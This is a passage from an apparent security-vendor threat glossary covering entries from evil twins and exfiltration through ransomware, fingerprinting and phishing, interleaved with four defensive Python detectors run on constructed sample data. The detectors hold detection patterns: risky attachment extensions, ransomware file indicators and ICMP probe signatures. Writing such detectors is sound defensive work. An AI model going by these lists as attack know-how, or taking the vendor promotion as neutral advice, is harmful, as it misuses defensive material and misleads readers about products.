How to Recognize This Threat: Not easily. You will be able to get online and the network listed will appear to be legitimate (though do look for and avoid any network names that are slightly off).
How to Prevent This Threat: Some would suggest not using any public wifi networks, but if that is impractical, VPN can provide an extra layer of security when accessing these networks. Also be aware of the procedures required to connect to any public network (whether they require authentication) and avoid transmitting any sensitive information when using these connections. As a network administrator, ensure you have strong security mechanisms in place, including authentication for users to access your network, endpoint protection (for both network and public users), and secure wifi. A Wireless Intrusion Prevention System (WIPS) such as the one offered through WatchGuard wireless access points can detect evil twins and even stop any managed clients from connecting to them.
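The two checks the entry above describes (an unknown radio advertising your SSID, and network names that are "slightly off") can be automated from a scan. This is an added example, not Firewalls.com or WatchGuard code; the AP inventory, the scan results and the look-alike character table are all constructed assumptions.

```python
"""Flag possible evil twins in a Wi-Fi scan (added example, not Firewalls.com
code). It assumes a constructed inventory of the APs we operate and a
constructed list of scan results; a WIPS does the same comparison from its
own sensors."""
from dataclasses import dataclass


@dataclass(frozen=True)
class ScanResult:
    ssid: str
    bssid: str      # radio MAC the network was seen from
    channel: int
    security: str   # "WPA2", "WPA3", "OPEN", ...


# Constructed inventory: SSID -> BSSIDs of the access points we actually manage.
MANAGED_APS = {
    "CorpWiFi": {"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"},
}

# Constructed scan results, as a laptop or sensor might report them.
SCAN = [
    ScanResult("CorpWiFi", "aa:bb:cc:00:00:01", 36, "WPA2"),
    ScanResult("CorpWiFi", "aa:bb:cc:00:00:02", 44, "WPA2"),
    # Same name as our network, unknown radio, no encryption: classic evil twin.
    ScanResult("CorpWiFi", "de:ad:be:ef:00:01", 6, "OPEN"),
    # Name that is "slightly off": lowercase L standing in for capital I.
    ScanResult("CorpWlFi", "de:ad:be:ef:00:02", 11, "WPA2"),
    ScanResult("Cafe-Free", "11:22:33:44:55:66", 1, "OPEN"),
]


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch near-duplicate SSIDs."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def normalize_ssid(ssid: str) -> str:
    """Fold case and common look-alike characters so 'CorpWlFi' compares equal
    to 'CorpWiFi'. The substitution table is an assumption; extend it as needed."""
    lookalikes = str.maketrans({"l": "i", "1": "i", "|": "i", "0": "o",
                                " ": "", "-": "", "_": ""})
    return ssid.lower().translate(lookalikes)


def find_evil_twins(scan, managed, max_distance=1):
    """Return (ScanResult, reason) pairs for networks that impersonate a managed SSID."""
    findings = []
    known = {ssid: {b.lower() for b in bssids} for ssid, bssids in managed.items()}
    for r in scan:
        if r.ssid in known:
            # Exact SSID match: only our own radios may advertise it.
            if r.bssid.lower() not in known[r.ssid]:
                findings.append((r, f"unknown BSSID advertising managed SSID "
                                    f"{r.ssid!r} ({r.security})"))
            continue
        # Otherwise look for names within one edit of a managed SSID after folding.
        for name in known:
            if levenshtein(normalize_ssid(r.ssid), normalize_ssid(name)) <= max_distance:
                findings.append((r, f"look-alike of managed SSID {name!r}"))
                break
    return findings


if __name__ == "__main__":
    for result, reason in find_evil_twins(SCAN, MANAGED_APS):
        print(f"{result.bssid} {result.ssid!r} ch{result.channel}: {reason}")
```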
What is Exfiltration in cybersecurity?
Exfiltration in cybersecurity refers to bad actors stealing or moving data. Exfiltration is also known as data theft, data exfil, extrusion, exportation, or extraction. Whatever the terminology, it boils down to unauthorized data movement. It can occur through malware infection or even through physical theft of devices that house sensitive data.
How to Recognize This Threat: Without the right tools, it can take organizations months to recognize data is gone. Deploy tools that offer visibility into your network and all related employee activity.
How to Prevent This Threat: What are those tools? The latest management consoles for networking devices like firewalls offer broad visibility into network activity, helping you detect and prevent exfiltration. Well-trained employees who know to avoid clicking on any unknown or unverified attachments help prevent malware designed to exfiltrate data from entering your network. Email security is a good supplement in that regard. And of course, securing your physical devices with locks and strong authentication measures makes it difficult for bad actors to get your data, even if they get the devices.
What is an Exploit?
An Exploit is the door through which a hacker gains access to your computer or network. It takes advantage of a vulnerability in a specific application to deliver malware and cause damage to your organization. The exploit door is typically closed when the vulnerability is patched.
How to Recognize This Threat: News related to application vulnerabilities should be regularly monitored, as hackers are doing the same. Developers will release patches typically as soon as they become aware of these vulnerabilities.
How to Prevent This Threat: Ensure you update your software applications and operating system every time updates are pushed out to ensure you have the least vulnerable versions with the latest patches. And of course, make sure your network is protected with a firewall combined with an active security services subscription in case a hacker comes calling. See your options from the top brands in network security.
Fake AntiVirus Malware
What is Fake AntiVirus Malware?
Fake AntiVirus Malware, also known as scareware, reports non-existent threats to users with the goal of scaring them into installing malicious software and/or paying for unnecessary product registration and cleanup. This type of malware is generally financially motivated, collecting credit card data of users who believe they must buy the software recommended by the fake antivirus scan.
How to Recognize This Threat: Users typically encounter this type of malware as an unwanted popup from a malicious (or compromised) website that displays a fake online scan message. It is mostly limited to illegitimate sites, but legitimate sites that users normally visit may be compromised with this type of malware for short periods.
How to Prevent This Threat: If such a popup message appears, users should be trained to close it and back out of the page they were visiting without taking any action. To protect your network and each computer on it, ensure you have up-to-date endpoint security protection.
What is Fileless Malware?
Fileless Malware is a type of malware that exists only in RAM – never actually making it onto a computer’s hard drive. Instead, fileless malware leverages operating system tools that are legitimately in use (primarily in Windows) like the system registry to execute malicious scripts. It may also be associated with Microsoft Office Macros, PowerShell, and more.
How to Recognize This Threat: Because it doesn’t depend on the download, installation, or execution of a file on a system, fileless malware is quite difficult to detect. Traditional anti-virus packages rely on the signatures of executable files to sniff out malware, but fileless malware leaves no such signature. In fact, in many cases it only runs when the legitimate process it’s associated with is running as well. And adding an additional measure of difficulty, it only runs while the computer is running and is gone without a trace when it’s rebooted. Fileless malware can infect a system through Office documents, PDFs, or other legitimate file types, or it can come through simple web browsing on an exploit-kit-affected site.
How to Prevent This Threat: Users should exercise due diligence in their online behaviors, only going to trusted sites, only opening trusted emails, and only downloading trusted attachments. Admins should closely monitor network activity as well. However, as it is so difficult to detect, good behavior and monitoring are not enough. While legacy anti-virus programs are little help, security solution providers of today use machine learning and AI processes that can detect and stop non-signature-based malware like fileless malware. That means protecting your network and each computer on it requires having up-to-date endpoint security protection in addition to a firewall with security services.
What is Fleeceware?
Fleeceware is a type of mobile attack that can cost victims considerable money, even without any malicious code in the offending application. An app considered fleeceware typically serves a basic function, like a calculator or a custom keyboard, but charges an often exorbitant subscription fee for its use – think a $10 weekly fee or a $200 monthly fee. These fees may also be deceptively hidden under the guise of a free trial or even increased during the checkout process.
How to Recognize This Threat: Because there is typically no malicious code involving data theft or device takeover, fleeceware apps often pass the test for app stores. Sophos found dozens of apps between the Google Play store and Apple App Store that fit these criteria in 2020. Recognizing the threat means paying very close attention to any app under consideration for a download and doing due diligence to ensure what it’s offering and the advertised cost make sense.
How to Prevent This Threat: Avoid downloading apps from little known developers unless their authenticity can be verified multiple ways and watch for prices on apps that are often free or near free from other vendors. On top of that, especially avoid agreeing to any form of recurring payment unless it is clearly legitimate.
Check your active app subscriptions both through the app stores and through your credit card statements to ensure you’re only paying for apps to which you’ve intentionally subscribed, and cancel any that shouldn’t be there. Both major mobile app stores continue to take steps to prevent fleeceware apps from making it onto their listings, so take advantage of their initial vetting. And protect your mobile device with Sophos Mobile options for added defense against fleeceware and other mobile malware.
What is Formjacking?
Formjacking essentially involves an attacker placing malicious code onto a normally reputable website that steals the personal information you enter – in other words, an online or virtual credit card or ATM skimming device. This practice has successfully targeted businesses of varying size, though small to medium-sized retailers are more frequent victims. Attackers often gain access through third-party add-ons and plug-ins that are part of a business website. Formjacking can target any type of online form, so not only credit card and banking information may be stolen, but also social security numbers, passport numbers, and more. According to estimates, thousands of websites have been affected.
How to Recognize This Threat: Users will likely not notice this at all until later discovering fraudulent purchases via credit card or bank statements. And businesses whose sites have been compromised may similarly find themselves unaware for lengthy periods, as the malicious code may not be noticed until an update to website code is made (which could be a several month timeframe). Businesses can potentially identify this sooner if they closely monitor outbound traffic for suspicious activity – providing them a cue to dig deeper.
How to Prevent This Threat: Consumers can take measures to protect themselves, like using a dedicated credit card for online purchases only to more quickly identify suspicious purchases. Avoiding the use of a debit card online is also helpful, as credit cards offer stronger protection against fraudulent purchases. In addition to strong visibility, businesses should have complete network security solutions in place to make it as difficult as possible for an attacker to gain access to place malicious code. That means a firewall with security services including a web application firewall, regularly updated software, and a close watch on any third-party plug-ins used in web development.
What is GandCrab Ransomware?
GandCrab is a type of ransomware first discovered in early 2018. This ransomware has multiple versions that have come out each time security professionals have released encryption keys. Broadly, GandCrab infects a computer, encrypts files, and drops files containing a message with instructions for the user to pay a ransom to have file access restored. In some versions of this ransomware, the message is also displayed as a desktop background. Affected files could have a number of extensions, including .crab or .krab.
How to Recognize This Threat: GandCrab was initially spread as an email scam, when users opened suspicious email attachments. It has since expanded to spread via websites that offer apparently helpful software downloads. Instead of the software, the user downloads the ransomware. It may also be included with certain exploit kits.
How to Prevent This Threat: Users should avoid opening any suspicious email attachments and avoid downloading any software from unverified sources. To protect your network from this threat, ensure you have a robust firewall with security services. See firewall options that fit your network from a variety of top brands.
What is Hacktivism?
Hacktivism refers to politically or socially motivated hacking. This includes cyber attacks against governments, corporations, organizations, and even individuals. Hacktivist attacks come in many forms, including denial-of-service, stealing and leaking sensitive information, and website defacement.
How to Recognize This Threat: Typically, hacktivist attacks are motivated by a high-profile issue, so even though targets vary, the entity will have done something that could have been controversial or have been in a position to right a perceived wrong.
How to Prevent This Threat: Aside from avoiding controversy as an organization, the best way to guard against hacktivists causing problems on your network is to have robust cyber security. It all starts with a firewall. See options from SonicWall, Fortinet, Sophos, & more.
What is a Hollow Process?
A Hollow Process Injection, also called Process Hollowing, refers to the code injection technique used by hackers to replace the executable section of a legitimate process with malicious code. This disguises malicious code so that a legitimate process will execute it. The legitimate path remains the same, but the malware is hidden within.
How to Recognize This Threat: This threat is difficult to recognize without advanced IT expertise or specialized scanner software, as once the hollow process injection takes place, the malware is able to delete other remnants of itself on the system.
How to Prevent This Threat: Keeping malware off your network is the best solution to avoiding a hollow process injection. The safest way to accomplish that level of protection is with a business-class firewall along with a security services subscription. Check out some of the top options available.
What is a Honeypot?
A Honeypot is a trap used by security specialists to gather information about malware or detect attacks by hackers.
How to Recognize This Threat: Honeypots are only threats to hackers, but some types of honeypots include setting up computers as part of a network simply to capture malware or setting up phony servers that log any attacks.
How to Prevent This Threat: Eliminate the need to setup a honeypot by ensuring your network is fully secure. Shop the top firewall brands and get a security services subscription that includes sandboxing, which is kind of like a cloud-based honeypot.
What is an Internet Worm?
An Internet Worm is a type of malware that replicates itself (often quite rapidly) across local networks or the internet simply by using communication between computers. Unlike viruses, they do not require a carrier file or program. Some worms can open a backdoor on a computer allowing hackers to take control and create a zombie system.
How to Recognize This Threat: Worms often initially enter a system as an email attachment. An infected computer will then have performance issues, with worms clogging up memory and automatically sending themselves to contacts far and wide.
How to Prevent This Threat: As with any malware, responsible users should avoid opening suspicious files. Comprehensive detection and protection is the key to preventing worms from causing problems on your network. Get a FREE Sophos or SonicWall firewall with a 3-year security services subscription to secure your organization.
What is Junkware?
Junkware is a somewhat all-encompassing term that covers unwanted or unnecessary programs on your computer. Sometimes referred to as bloatware or Potentially Unwanted Programs (PUPs), junkware is not malicious, but may add vulnerabilities to a system through which malware can enter. It can also slow performance of a system by using memory and processing space.
How to Recognize This Threat: Types of junkware may be adware, remote administration tools, and vulnerability scanners to name a few. Some of these applications may come with a computer out-of-the-box, while others may be included with downloads of programs the user intentionally installs.
How to Prevent This Threat: Administrators can set policies requiring privileges for users to load software on their computers, which can keep users from adding junkware to systems on your network. If junkware is already present or finds its way onto a computer through some other fashion, endpoint security solutions can detect and report many types of junkware to help clean up the system.
What is a Keylogger?
A Keylogger (short for keystroke logger) is a type of malware that records a user’s keystrokes. A hacker can use this information to steal passwords, account numbers, and any other information the user types while being monitored by such a program.
How to Recognize This Threat: Your computer may run more slowly with additional processes clogging up the system. If you suspect your computer has a keylogger, check Task Manager and your computer’s startup configurations to see if there are any unusual/suspicious programs.
How to Prevent This Threat: User vigilance to avoid downloading malware is an important step as always. For your network, ensure you have the latest software updates and strong endpoint protection for each device.
What are Logic Bombs?
Logic Bombs are pieces of code (usually malicious) inserted into a program that will set off a function if certain conditions (such as a behavior or a specific date/time) are met. Such functions could restrict access to or delete files. Logic Bombs – also known as slag code – are dormant until/unless those conditions are satisfied. While their uses are typically malicious – think a disgruntled employee leaving a present after being let go – logic bombs can also be used in trial software to end free access after a certain period.
How to Recognize This Threat: As logic bombs are typically deployed within a network, the most likely source is a disgruntled IT employee, so close monitoring of the activities of departing staff should reveal any suspicious activities. Logic bombs can also be planted in email attachments and suspicious file downloads, so users should be vigilant when choosing files to download.
How to Prevent This Threat: Limit administrative privileges to a select group of employees so it is less likely someone can cause major network damage by leaving a logic bomb (also a deterrent if the privilege makes it clear who would have done so). A firewall with up-to-date security services subscriptions will detect malware and make it less likely to cause major damage. Shop the top brands for your business.
What is Macro Malware?
Macro Malware (also known as Macro Viruses) is malware written in the same programming language as Microsoft Office macros. This malware type is typically spread as attachments in phishing emails and, when run, begins to infect all files opened with Office.
How to Recognize This Threat: Users can look for macro malware primarily in suspicious email messages as attachments that have Office file extensions.
How to Prevent This Threat: The simplest method to avoid infection by macro malware is to refrain from opening suspicious email attachments. To protect your network further from infection in case a user does become compromised, ensure you have a firewall with an up-to-date security services subscription. Get a FREE Sophos or SonicWall firewall with a 3-year subscription.
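Both the Email Malware Distribution entry and the Macro Malware entry come down to the same triage: look at what arrived as an attachment and whether the message is pushing the reader to run it. This added example (not Firewalls.com code) parses a constructed message with the standard library and rates each attachment; the extension lists and lure phrases are the author's assumptions, not a vendor's.

```python
"""Triage an e-mail for the attachment types the Email Malware Distribution and
Macro Malware entries warn about (added example, not Firewalls.com code). The
message is constructed inline; the extension lists and lure phrases are the
author's assumptions, not a vendor list."""
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from pathlib import PurePosixPath

# Office formats that can carry macros (the legacy binary formats always can).
MACRO_CAPABLE = {".doc", ".xls", ".ppt", ".docm", ".xlsm", ".pptm", ".dotm", ".xltm"}
# Script and executable types that run directly when double-clicked.
EXECUTABLE = {".exe", ".scr", ".js", ".vbs", ".hta", ".ps1", ".bat", ".cmd", ".jar", ".lnk"}
# Containers that hide the real file type from a casual glance and from some filters.
ARCHIVE = {".zip", ".rar", ".7z", ".iso", ".img"}
# Innocuous-looking first extensions used in "report.pdf.zip" style names.
DECOY = {".pdf", ".txt", ".jpg", ".png", ".doc", ".docx"}
# Wording that nudges the reader to switch macros on.
LURE_PHRASES = ("enable content", "enable editing", "enable macros")


def build_sample_message() -> bytes:
    """Constructed phishing-style message: macro document plus a decoy-named archive."""
    msg = EmailMessage()
    msg["From"] = "Accounts Payable <ap@examp1e-corp.test>"   # look-alike sender, constructed
    msg["To"] = "user@example.test"
    msg["Subject"] = "Invoice attached - please enable content"
    msg.set_content("Please open the attached invoice and enable editing to view it.")
    msg.add_attachment(b"not-a-real-document", maintype="application",
                       subtype="vnd.ms-word.document.macroEnabled.12",
                       filename="Invoice_0423.docm")
    msg.add_attachment(b"not-a-real-pdf", maintype="application", subtype="pdf",
                       filename="terms.pdf")
    msg.add_attachment(b"not-a-real-zip", maintype="application", subtype="zip",
                       filename="report.pdf.zip")
    return msg.as_bytes()


def classify_attachment(filename: str) -> dict:
    """Rate one attachment name low / medium / high and list the reasons."""
    suffixes = [s.lower() for s in PurePosixPath(filename).suffixes]
    ext = suffixes[-1] if suffixes else ""
    reasons = []
    if ext in MACRO_CAPABLE:
        reasons.append("macro-capable Office document")
    if ext in EXECUTABLE:
        reasons.append("directly executable type")
    if ext in ARCHIVE:
        reasons.append("archive container")
    if len(suffixes) >= 2 and suffixes[-2] in DECOY:
        reasons.append("double extension")
    if any(r.startswith(("macro", "directly")) for r in reasons):
        risk = "high"
    elif reasons:
        risk = "medium"
    else:
        risk = "low"
    return {"filename": filename, "risk": risk, "reasons": reasons}


def triage_message(raw: bytes) -> dict:
    """Parse a raw RFC 5322 message; report risky attachments and macro-lure wording."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    attachments = [classify_attachment(part.get_filename() or "")
                   for part in msg.iter_attachments()]
    body = msg.get_body(preferencelist=("plain",))
    text = ((msg["Subject"] or "") + " " + (body.get_content() if body else "")).lower()
    lures = [phrase for phrase in LURE_PHRASES if phrase in text]
    return {"from": str(msg["From"]), "attachments": attachments, "lure_phrases": lures}


if __name__ == "__main__":
    report = triage_message(build_sample_message())
    print("from:", report["from"], "| lure phrases:", report["lure_phrases"])
    for a in report["attachments"]:
        print(f"  {a['risk']:6} {a['filename']}: {', '.join(a['reasons']) or 'no flags'}")
```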
Malicious Process Migration
What is a Malicious Process Migration?
Malicious Process Migration involves a hacker moving malware from one compromised process to another. This allows the hacker to better avoid detection and maintain a connection with the infected computer even when the browser session is ended by the user. It is a fairly common practice in hacking to attempt to gain more privileges or establish a more permanent hold on a device.
How to Recognize This Threat: If a hacker is active on a user’s computer, then there may be increased processor activity. A malicious migration typically uses DLL exploits, which some scans may pick up.
How to Prevent This Threat: Sophos Intercept X endpoint protection is designed to detect and terminate these attacks. The software will also alert network admins that such an attack has occurred, and generate a root cause analysis to further investigate the incident.
What is Malware?
Malware is the all-encompassing term that refers to any malicious software. It includes viruses, worms, Trojans, and spyware.
How to Recognize This Threat: The threat of malware is out there at all times for any device that is online (and even those not connected). It can be spread through email, links, USB drives, and more via both targeted and general attacks.
How to Prevent This Threat: Vigilance is key for users to avoid inviting malware onto their device, by staying away from questionable sites and refraining from downloading suspicious files. For true network protection against malware, your organization should have a firewall complete with a security services subscription. Find the right one for you!
What is a Man-in-the-Middle Attack?
A Man-in-the-Middle Attack involves a hacker intercepting communications between you and an outside entity. This attack can occur via email, social media, WiFi eavesdropping, general online activity, or even phone communications. In such an attack, the hacker can impersonate one of the entities communicating, for instance pretending to be an account holder when transferring money through a bank, and redirecting funds to a private account. Or a hacker could simply intercept personal data a user is sharing with a website.
How to Recognize This Threat: As noted above, the threat is multi-tiered and attacks could occur in a variety of manners. It pays to be aware of your surroundings, whether it be double-checking that websites you interact with are secured, looking out for dummy public WiFi networks, or watching for email phishing schemes.
How to Prevent This Threat: As Man-in-the-Middle attacks vary, it pays to protect against a variety of threats. Your users should be trained to look for signs of these different attacks, but when it comes to your network, a firewall with a security services subscription is the way to go.
What is Mobile Malware?
Mobile Malware is a breed of malware specifically intended to run on mobile devices like smartphones and tablets. Thousands of types of mobile malware have been discovered since late 2010, with researchers having discovered more malicious apps for Android than iOS. Aside from what’s targeted, mobile malware is similar to traditional malware in that it is meant to steal sensitive information from users.
How to Recognize This Threat: Infected devices will use abnormally large amounts of data, drain batteries, have unusual popups, and have unexplained charges on the monthly bill.
How to Prevent This Threat: Just as computer users should exercise caution when web browsing and opening emails, mobile users should only download apps from verified sources, avoiding file sharing sites. If you have mobile devices as part of your organization, ensure your network is protected with a firewall solution that includes a security services subscription. Shop our Promos to get a Sophos or SonicWall firewall free with a subscription. And be sure to include endpoint protection.
What is MongoLock?
MongoLock is a recent strain of ransomware that attempts to remove files and format drives by executing special commands through cmd. MongoLock is designed to take advantage of databases with weak security settings. MongoLock leaves a tell-tale sign of its presence with a ransom note in the form of a “warning.txt” file on the system. This warning may also be dropped as an entry inside whatever database is successfully breached. MongoLock has a global reach and can be found commonly across the modern threat landscape.
In most cases, a MongoLock ransom note asks for 0.1 BTC, to be paid out to a specified Bitcoin wallet of the attacker’s choosing.
How to Recognize This Threat: When locking up files, MongoLock always adds the extension .mongo to the end of your file names. For example, “Image.PNG” will become “Image.PNG.mongo.” Furthermore, attempting to open any files encrypted by MongoLock will open the “warning.txt” with instructions to pay off the baddies.
How to Prevent This Threat: Since MongoLock usually infects systems through malicious email, training employees in basic email security can help eliminate the most common point of entry for this file-encrypting malware. However, the best solution to ward off MongoLock is a current generation firewall operating with up-to-date firmware and a strong Anti-Virus service. Pick from the top brands to get one shipped to you today.
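The GandCrab and MongoLock entries above both name concrete on-disk artifacts (files renamed with .crab/.krab or .mongo, and a warning.txt note), which a scan of a file share can pick up before anyone notices a ransom screen. This added example (not Firewalls.com code) walks a constructed directory tree for those indicators; the family labels and the sample file contents are the author's assumptions.

```python
"""Scan a directory tree for the GandCrab and MongoLock artifacts described in
the two entries above (added example, not Firewalls.com code). The indicators
come from the entries (.crab/.krab, .mongo, warning.txt); the sample tree is
constructed in a temporary directory."""
import os
import tempfile
from collections import defaultdict
from pathlib import Path

# Extension -> family, as described in the dictionary entries above.
RANSOM_EXTENSIONS = {".crab": "GandCrab", ".krab": "GandCrab", ".mongo": "MongoLock"}
# Ransom-note file names; a note next to renamed files is a strong signal.
RANSOM_NOTES = {"warning.txt": "MongoLock"}


def original_name(name: str) -> str:
    """'Image.PNG.mongo' -> 'Image.PNG': the ransom extension is appended, not substituted."""
    p = Path(name)
    return p.stem if p.suffix.lower() in RANSOM_EXTENSIONS else name


def scan_tree(root) -> list:
    """Return (path, family, indicator) for every ransomware artifact found under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            if name.lower() in RANSOM_NOTES:
                hits.append((path, RANSOM_NOTES[name.lower()], "ransom note"))
            family = RANSOM_EXTENSIONS.get(path.suffix.lower())
            if family:
                hits.append((path, family, "encrypted file"))
    return hits


def summarize(hits) -> dict:
    """family -> {indicator: count}. Encrypted files plus the family's note
    (where it drops one) is the combination worth paging someone for."""
    counts = defaultdict(lambda: defaultdict(int))
    for _path, family, indicator in hits:
        counts[family][indicator] += 1
    return {family: dict(ind) for family, ind in counts.items()}


def build_sample_tree() -> str:
    """Constructed victim-like tree: two renamed files, one note, one clean file."""
    root = Path(tempfile.mkdtemp(prefix="ransom-demo-"))
    (root / "Pictures").mkdir()
    (root / "Docs").mkdir()
    (root / "Pictures" / "Image.PNG.mongo").write_bytes(b"\x00" * 16)   # constructed content
    (root / "Pictures" / "warning.txt").write_text("constructed ransom note text\n")
    (root / "Docs" / "report.docx.krab").write_bytes(b"\x00" * 16)
    (root / "Docs" / "notes.txt").write_text("nothing to see here\n")
    return str(root)


if __name__ == "__main__":
    root = build_sample_tree()
    hits = scan_tree(root)
    for path, family, indicator in hits:
        print(f"{family:9} {indicator:14} {path}  (was {original_name(path.name)})")
    print(summarize(hits))
```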
What is Network Sniffing?
Network Sniffing involves hardware or software that monitors and/or analyzes network traffic. Network sniffing can be done ethically – such as admins monitoring their own network’s status – or maliciously – as these tools in the hands of a hacker can be used not only to monitor private networks, but also to intercept and steal private information traveling over them, such as user logins, emails, and proprietary data.
How to Recognize This Threat: An unauthorized sniffer is generally quite difficult to spot unless other sniffers are running to detect them.
How to Prevent This Threat: Secure your network against outside threats such as network sniffers with a firewall along with a security services subscription. Get a firewall Free with a 3-year subscription through SonicWall or Sophos.
What is Obfuscation?
Obfuscation in the cyber world refers to methods used to make computer code unclear, allowing hackers to disguise malware. This is commonly done with a variety of malware so that network professionals and security programs cannot detect or block its presence. Obfuscated code also makes it tougher to analyze malware, which in turn makes it difficult to create a permanent fix. Obfuscation can also be used for good, making legitimate software more secure.
How to Recognize This Threat: Obfuscation is designed to make malware difficult to detect, but antivirus and other intrusion prevention software typically employ heuristic detection techniques which can identify the presence of obfuscated code.
How to Prevent This Threat: Get a firewall from a top brand along with a security services subscription. This will ensure your network has the latest in antivirus and intrusion prevention technology to help find and catch malware with obfuscated code.
What is OS Fingerprinting?
Operating System (OS) Fingerprinting is the process of analyzing data packets which originate from a network in an attempt to glean intelligence to be used in later attacks. By detecting which operating system a network operates on, hackers have an easier time targeting known vulnerabilities. OS Fingerprinting can also collect configuration attributes from remote devices. This type of recon attack is usually the first step in a larger, persistent effort. Networks running old, outdated, or unpatched operating systems become big targets when attackers spot their weakness.
How to Recognize This Threat: To detect OS Fingerprinting, it is important to understand how it occurs. There are two types of OS Fingerprinting: Active & Passive.
In an active OS Fingerprinting attempt, attackers send a packet to a victim and then wait on a response to analyze TCP packet contents. In a passive attempt attackers act more as a “sniffer” that makes no deliberate changes or actions against the network. Passive OS Fingerprinting is stealthier, but a far slower process. Nmap is perhaps the most popular and commonly-used tool for OS Fingerprinting.
How to Prevent This Threat: The best way to prevent fingerprinting is to limit the types of traffic that your network accepts and responds to, as well as tightly control what information your network returns. By blocking timestamps, echo replies, and address masks, admins can greatly reduce the usefulness of information that attackers can gather. Our team of certified engineers can help you reduce attack surfaces on your network and ensure that your firewall and operating system are as stealthy as possible.
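Active fingerprinting leaves the probes the entry above mentions in the firewall log: ICMP timestamp and address-mask requests have almost no legitimate use at a perimeter, and a single source touching several ports in one second is reconnaissance. This added example (not Firewalls.com code) scores constructed netfilter/iptables-style log lines per source; the line format, weights and thresholds are the author's assumptions.

```python
"""Spot active OS-fingerprinting probes in firewall logs (added example, not
Firewalls.com code). The log lines are constructed in the key=value style that
netfilter/iptables LOG targets emit; the scoring weights are assumptions."""
import re
from collections import defaultdict

# ICMP request types the entry above says to block. Types 13 and 17 have almost
# no legitimate use on a perimeter, so even one of them deserves a look.
ICMP_PROBES = {13: "ICMP timestamp request", 17: "ICMP address mask request",
               8: "ICMP echo request"}
DISTINCT_PORT_THRESHOLD = 3   # assumption: one source hitting this many TCP ports is probing

# Constructed log excerpt: one host runs a fingerprinting sweep, two others are benign.
SAMPLE_LOG = """\
Mar  3 10:01:02 gw kernel: IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.10 PROTO=ICMP TYPE=13 CODE=0
Mar  3 10:01:02 gw kernel: IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.10 PROTO=ICMP TYPE=17 CODE=0
Mar  3 10:01:03 gw kernel: IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.10 PROTO=ICMP TYPE=8 CODE=0
Mar  3 10:01:03 gw kernel: IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.10 PROTO=TCP SPT=40001 DPT=22 SYN
Mar  3 10:01:03 gw kernel: IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.10 PROTO=TCP SPT=40002 DPT=80 SYN
Mar  3 10:01:03 gw kernel: IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.10 PROTO=TCP SPT=40003 DPT=443 SYN
Mar  3 10:05:00 gw kernel: IN=eth0 OUT= SRC=198.51.100.4 DST=192.0.2.10 PROTO=ICMP TYPE=8 CODE=0
Mar  3 10:06:00 gw kernel: IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=51000 DPT=443 SYN
"""

KV_RE = re.compile(r"(\w+)=(\S*)")


def parse_line(line: str) -> dict:
    """Turn 'SRC=1.2.3.4 DST=... PROTO=ICMP TYPE=13' into a dict of fields."""
    return dict(KV_RE.findall(line))


def analyze_firewall_log(text: str) -> dict:
    """Return {src: {"indicators": set, "score": int}} for sources whose traffic
    looks like fingerprinting; sources below the threshold are omitted."""
    icmp_seen = defaultdict(set)   # src -> ICMP types sent
    tcp_ports = defaultdict(set)   # src -> destination ports touched
    for line in text.splitlines():
        f = parse_line(line)
        src = f.get("SRC")
        if not src:
            continue
        if f.get("PROTO") == "ICMP" and f.get("TYPE", "").isdigit():
            icmp_seen[src].add(int(f["TYPE"]))
        elif f.get("PROTO") == "TCP" and f.get("DPT", "").isdigit():
            tcp_ports[src].add(int(f["DPT"]))

    report = {}
    for src in set(icmp_seen) | set(tcp_ports):
        indicators, score = set(), 0
        for icmp_type in icmp_seen[src]:
            if icmp_type in ICMP_PROBES:
                indicators.add(ICMP_PROBES[icmp_type])
                score += 1 if icmp_type == 8 else 3   # timestamp/mask weigh more than a ping
        if len(tcp_ports[src]) >= DISTINCT_PORT_THRESHOLD:
            indicators.add(f"{len(tcp_ports[src])} distinct TCP ports probed")
            score += 2
        if score >= 3:   # a lone ping or a single connection never reaches this
            report[src] = {"indicators": indicators, "score": score}
    return report


if __name__ == "__main__":
    for src, info in sorted(analyze_firewall_log(SAMPLE_LOG).items()):
        print(src, info["score"], sorted(info["indicators"]))
```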
What is a Parasitic Virus?
A Parasitic Virus (also referred to as a file virus) is a type of virus that spreads by attaching itself to another program. When a program that is infected with a parasitic virus runs, the virus code runs as well, and the computer’s operating system gives the virus code the same rights as the program. This allows the virus to make changes on the computer, install itself within the computer’s memory, or copy itself.
How to Recognize This Threat: Parasitic viruses are not as common as they used to be, but have resurfaced somewhat in recent years. The signs of a parasitic virus infection are similar to those of any virus: slower performance, pop-ups, new tasks running, changes to web browsers, etc.
How to Prevent This Threat: To avoid a parasitic virus infection, users should avoid clicking suspicious links or downloading attachments from unverified emails, as well as visiting suspicious sites. Aside from training users, endpoint protection is key to keeping your network clear of parasitic viruses.
What are patches?
Patches are not actually threats; they are add-ons designed by software creators to fix security vulnerabilities and other known bugs. The idea is that these software creators catch vulnerabilities on their own and patch them before they are exploited, but often an attack by a hacker is the signal that alerts software-makers of security flaws.
How to Recognize This Threat: The threat in this case is not keeping your software updated with the latest patches. Hackers often look to exploit known vulnerabilities, banking on the fact that many do not update their software in a timely manner (or at all).
How to Prevent This Threat: Major software developers have regular updates scheduled and will often alert users directly on their devices. Admins should stay abreast of these updates by subscribing to vulnerability mailing lists as well, since some patches are needed sooner than scheduled updates, and should also set policies to ensure all networked computers have the latest patches. A Managed Security Service subscription from Firewalls.com will help you with your network configuration and ensuring the latest updates are coming through, leaving those nitty-gritty details to us!
What is Phishing?
It’s not following a certain hippie band, nor is it heading down to the lake to catch a trout. Phishing relates to a type of email scam designed to deceive recipients into sharing sensitive information with a hacker. Phishing emails often appear to come from a reputable source such as a bank, social media channel, internal department, or another business with whom you have an account, like a retailer, online game, or online music service.
